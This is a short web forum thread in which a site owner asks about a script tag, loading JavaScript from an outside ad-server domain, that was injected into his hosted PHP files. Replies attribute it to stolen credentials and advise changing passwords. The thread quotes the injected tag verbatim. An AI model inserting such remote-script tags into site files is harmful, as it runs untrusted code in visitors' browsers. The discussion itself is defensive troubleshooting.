script got hacked?

[chiefrokka]

I noticed one of my gaming scripts all of a sudden this year starting producing errors... I checked the line it was giving an error and it seems like this code was added to my .php file on my domain somehow.

 

<script src='http://b.adserv.cn/E/J.JS'></script>

 

any idea how or what that might actually do?  I had the script in 2 different locations and both locations had this line input on them but when I checked my sourefiles on my harddrive it never had this line so it got added to the file on my domain somehow. 

[Mchl]

This is obviously inluding a JavaScript file form the address in the code.

It seems someone got writing access to your web directory.

 

It might be one of those 'free' hosting sites, that add ads to sites they host.

[chiefrokka]

it's GoDaddy... been  using them for few years now with no issues.  the file that was written has 644 attributes.  writable for owner only

[Mchl]

Change passwords at least.

You might want to inform your hosting company, that a security has been breached somewhere.

[knowj]

Usually when someone hacks the server your on or manages to get your ftp password as your web hosting provider will usually tell you (usually a lie). just change your passwords and remove the offending code.

[chiefrokka]

ya, guess i can change password for godaddy.  i just wan't sure if there's any way besides getting password that someone could do this via xss or something

[DeanWhitehouse]

If the actuall script has been edited, then no its not something done through the site, it will be direct access to the code.